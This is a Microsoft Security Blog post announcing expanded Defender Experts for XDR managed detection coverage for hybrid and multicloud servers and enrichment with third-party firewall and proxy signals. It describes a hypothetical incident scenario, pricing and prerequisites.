Defender Experts for XDR now delivers 24/7, expert-led managed extended detection and response (MXDR) for your hybrid and multicloud servers in Defender for Cloud. Our security analysts will investigate, triage, and respond to alerts on your on-premises and cloud VMs across Microsoft Azure, Amazon Web Services, and Google Cloud Platform. With Defender Experts for Hunting, which is included in Defender Experts for XDR and also available as a standalone service, our expert threat hunters will now be able to hunt across hybrid and multicloud servers in addition to endpoints, identities, emails, and cloud apps, reducing blind spots and uncovering emerging cloud threats.

Figure 1: Incidents from servers in Defender for Cloud investigated by Defender Experts

Incident enrichment for improved detection accuracy and faster response

By enriching Defender incidents with third-party network signals from Palo Alto Networks (PAN-OS Firewall), Zscaler (Zscaler Internet Access and Zscaler Private Access), and Fortinet (FortiGate Next-Generation Firewall), our security analysts gain deeper insights into attack paths. The additional context helps Defender Experts for XDR identify patterns and connections across domains, enabling more accurate detection and faster response to threats.

Figure 2: Third-party enrichment data in Defender Experts for XDR report

In this hypothetical scenario, we explore how incident enrichment with third-party network signals helped Defender Experts for XDR uncover lateral movement and potential data exfiltration attempts.

• Detection: Microsoft Defender for Identity flagged an “Atypical Travel” alert for User A, showing sign-ins from India and Germany within a short timeframe using different devices and IPs, suggesting possible credential compromise or session hijacking. However, initial identity and cloud reviews showed no signs of malicious activity.
• Correlation: From incident enrichment with third-party network signals, Palo Alto firewall logs revealed attempts to access unauthorized remote tools, while Zscaler proxy data showed encrypted traffic to an unprotected legacy SharePoint server.
• Investigation: Our security analysts uncovered that the attacker authenticated from a managed mobile device in Germany. Due to token reuse and a misconfigured Mobile Device Management profile, the device passed posture checks and bypassed Conditional Access, enabling access to internal SharePoint. Insights from third-party network signals helped Defender Experts for XDR confirm lateral movement and potential data exfiltration.
• Response: Once malicious access was confirmed, Defender Experts for XDR initiated a coordinated response, revoking active tokens, isolating affected devices, and hardening mobile policies to enforce Conditional Access.

Flexible, cost-effective pricing

Defender Experts coverage of servers in Defender for Cloud is priced per server per month, with charges based on the total number of server hours each month. You have the flexibility to scale your servers as needed while ensuring cost effectiveness as you only pay for Defender Experts coverage based on resources you use. For example, if you have a total of 4000 hours across all servers protected by Defender for Cloud in June (June has a total of 720 hours), you will be charged for a total of 5.56 servers in June (4000/720 = 5.56).

There is no additional charge for third-party network signal enrichment beyond the data ingestion charge through Microsoft Sentinel.

Please contact your Microsoft account representative for more information on pricing.

Get started today

Defender Experts coverage of servers in Defender for Cloud will be available as an add-on to Defender Experts for XDR and Defender Experts for Hunting. To enable coverage, you must have the following:

• Defender Experts for XDR or Defender Experts for Hunting license
• Defender for Servers Plan 1 or Plan 2 in Defender for Cloud

You only need a minimum of 1 Defender Experts for XDR or Defender Experts for Hunting license to enable coverage of all your servers in Defender for Cloud.

If you are interested in purchasing Defender Experts for XDR or the add-on for Defender Experts coverage of servers in Defender for Cloud, please complete this interest form.

Third-party network signals for enrichment are available only for Defender Experts for XDR customers. To enable third-party network signals for enrichment, you must have the following:

• Microsoft Sentinel instance deployed
• Microsoft Sentinel onboarded to Microsoft Defender portal
• At least one of the supported network signals ingested through Sentinel built-in connectors:
  • Palo Alto Networks (PAN-OS Firewall)
  • Zscaler (Zscaler Internet Access and Zscaler Private Access)
  • Fortinet (FortiGate Next-Generation Firewall)

If you are an existing Defender Experts for XDR customer and are interested in enabling third-party network signals for enrichment, please reach out to your Service Delivery Manager.

Learn more

• Technical Documentation
  • Microsoft Defender Experts for XDR
  • Microsoft Defender Experts for Hunting
  • Third-party network signals for enrichment
  • Plan Defender for Servers deployment
• Defender Experts Ninja Training

The post Elevate your protection with expanded Microsoft Defender Experts coverage appeared first on Microsoft Security Blog.